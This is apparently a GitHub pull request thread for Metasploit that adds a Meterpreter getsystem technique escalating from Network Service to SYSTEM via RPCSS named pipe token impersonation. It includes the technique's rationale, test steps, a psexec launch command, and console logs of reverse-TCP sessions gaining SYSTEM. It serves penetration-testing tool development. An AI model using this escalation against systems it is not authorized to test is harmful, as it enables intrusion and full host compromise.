
New GetSystem Technique: Named Pipe Impersonation (RPCSS Variant) #14030

Merged (5 commits, Sep 28, 2020)

Conversation

@zeroSteiner (Contributor) commented Aug 20, 2020

This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM 🎉. In order to make this more dynamic, when filtering out the token handles for the RPCSS service, I select the SYSTEM token with the most privileges (to account for filtered tokens). This should select the best / most-privileged SYSTEM token on multiple versions of Windows, instead of using the hard-coded value of 22 as described in Faxing Your Way To System.

This is the Framework side of rapid7/metasploit-payloads#431.

I also fixed a bug where the service name parameter was missing for the most common technique (1). This fixes the getsystem -t 1 command.

I tested this code in the following environments:

  • Windows 8.1 Native x86
  • Windows 10 WOW64
  • Windows 10 Native x64

While I also tested Windows 7, the NtQueryInformationProcess command reported that the ProcessHandleInformation was unavailable by returning NT status 0xc0000003 (STATUS_INVALID_INFO_CLASS). Because of that, I pinned this to Windows versions 6.3 and newer which is Windows 8.1 / Server 2012 R2. On older systems, Meterpreter will fail with ERROR_CALL_NOT_IMPLEMENTED.

For reference on this technique:

I also want to note that I think this escalation technique is a good candidate for incorporation into getsystem for the following reasons (as opposed to implementation as a local exploit module via an RDLL).

  • Well, the technique gets SYSTEM, but it does it reliably, in memory, from x86 / WOW64 / x64 environments with no necessary configuration
  • I don't think there will be a patch for the technique, there's no CVE assigned to it that I'm aware of and it was first published by James Forshaw a few months ago in April
  • We can use the existing logic for the impersonation of named pipes that's already used by getsystem

Verification

List the steps needed to make sure this thing works

  • Build the binaries from GetSystem Technique #4 (Named Pipe Impersonation RPCSS Variant) metasploit-payloads#431 and copy them to ~/.msf4/payloads/meterpreter.
  • Start msfconsole and setup a handler for a native Windows Meterpreter
  • Get a session running as NT AUTHORITY\NETWORK SERVICE (use these steps)
  • Run getsystem, you should see that it was successful using technique 4
    • Note that running getsystem without a specific technique causes all of them to be attempted sequentially, so this also shows that the existing techniques 1-3 did not work

Demo

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (221766 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:50157) at 2020-08-20 14:31:40 -0400
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter >

@gwillcox-r7 (Contributor)

Unassigning due to some local issues on my PC which are slowing testing of this PR. Feel free to assign this issue to someone else if I don't get back to this in time, and apologies for the delay!

@bwatters-r7 bwatters-r7 self-assigned this Sep 3, 2020
@bwatters-r7 (Contributor)

I was not able to get the powershell magic working, so I used psexec from sysinternals. To launch the payload with nt authority/Network service just run

psexec64.exe -i -u "nt authority\network service" <payload>

When the payload calls back:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.197:4567 
[*] Sending stage (221766 bytes) to 192.168.134.174
[*] Meterpreter session 3 opened (192.168.135.197:4567 -> 192.168.134.174:50539) at 2020-09-04 14:00:08 -0500

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
WARNING: Local file /home/tmoose/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@bwatters-r7 (Contributor)

This looks good, but I'm going to let it hang around for a few days in hopes that @OJ drops in and gives it a once-over.

@bwatters-r7 bwatters-r7 mentioned this pull request Sep 28, 2020
@bwatters-r7 bwatters-r7 merged commit 9416b9e into rapid7:master Sep 28, 2020
@bwatters-r7 (Contributor)

Release Notes:

This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM. This also includes two payload version bumps to account for (1) the payload side to implement this functionality, and a separate, unrelated PR to add a security.MD document to payloads.
